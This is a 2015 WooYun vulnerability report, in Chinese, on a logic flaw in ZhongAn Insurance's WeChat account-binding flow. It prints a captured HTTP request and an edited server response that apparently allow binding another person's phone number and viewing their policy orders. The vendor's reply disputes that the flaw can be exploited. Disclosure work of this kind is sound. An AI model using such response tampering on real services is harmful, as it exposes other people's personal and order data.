当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0141816

漏洞标题:众安保险某处逻辑错误可绑定任意用户手机号或影响订单信息(以13888888888为例)

相关厂商:众安在线财产保险股份有限公司

漏洞作者: 路人甲

提交时间:2015-09-20 10:15

修复时间:2015-11-02 10:52

公开时间:2015-11-02 10:52

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-09-20: 细节已通知厂商并且等待厂商处理中
2015-09-18: 厂商已经确认,细节仅向厂商公开
2015-09-28: 细节向核心白帽子及相关领域专家公开
2015-10-08: 细节向普通白帽子公开
2015-10-18: 细节向实习白帽子公开
2015-11-02: 细节向公众公开

简要描述:

可绑定任意用户手机号

详细说明:

问题是出现在 微信端的 众安保险 点击个人中心-我的保单
然后输入手机号 13888888888
点击获取验证码,然后提交的时候抓包

5.jpg


GET /weixin/index.php?r=/userBind/bind&identityName=%E7%8E%8B%E5%B8%85&identity=110000197609260652&identityPhone=13012345678&verifyCode=111111 HTTP/1.1
Host: **.**.**.**
Referer: http://**.**.**.**/weixin/index.php?r=userBind/bindUserInfo&refferUrl=%2Fweixin%2Findex.php%3Fr%3Daviation%2Forder
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip, deflate
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-cn
Cookie: Hm_lpvt_45707c8495c2e8cbd4584bbac4a7e6fc=1442476630; Hm_lvt_45707c8495c2e8cbd4584bbac4a7e6fc=1442476630; zhongan_open_id=o_MtruCJd8ODGSktqb80pSGIt5sQ; pgv_pvi=6374802432; pgv_si=s266788864; Userid="3caf1gDze8QMGglAhSqCQg=="
Connection: keep-alive
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12H143 MicroMessenger/6.2.4 NetType/WIFI Language/zh_CN


看下返回包

3.jpg


然后修改返回包

{"ret":0,"msg":"ok","data":"\u8bf7\u91cd\u65b0\u8f93\u5165\uff01"}


4.jpg


然后成功绑定

6.jpg


这里显示的是订单内容 只要该手机号存在订单,即可查看~

7.jpg

漏洞证明:

6.jpg

修复方案:

完善下逻辑

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-09-18 10:50

厂商回复:

谢谢支持!

最新状态:

2015-09-21:经验证,该漏洞无法被有效利用,为误报漏洞。对于已绑定的手机号:由于手机号已与身份证号绑定,后台验证手机号码与身份证号不匹配,会拒绝发送短信验证码。对于未绑定的手机号:13888888888可以重复进行绑定操作,页面会弹出成功绑定身份信息,但后台执行验证判断验证码不匹配,系统会自动跳转回信息输入页面。


漏洞评价:

评论

  1. 2015-09-17 20:51 | 红客十年 ( 普通白帽子 | Rank:336 漏洞数:64 | 去年离职富士康,回到家中上蓝翔,蓝翔毕业...)

    这手机号动不动就躺枪了。。机主真倒霉。只要你们挖洞无辜受伤的总是他

  2. 2015-09-18 08:43 | px1624 ( 普通白帽子 | Rank:1038 漏洞数:176 | px1624)

    有是这号,这机主真是万年小黑屋啊。。。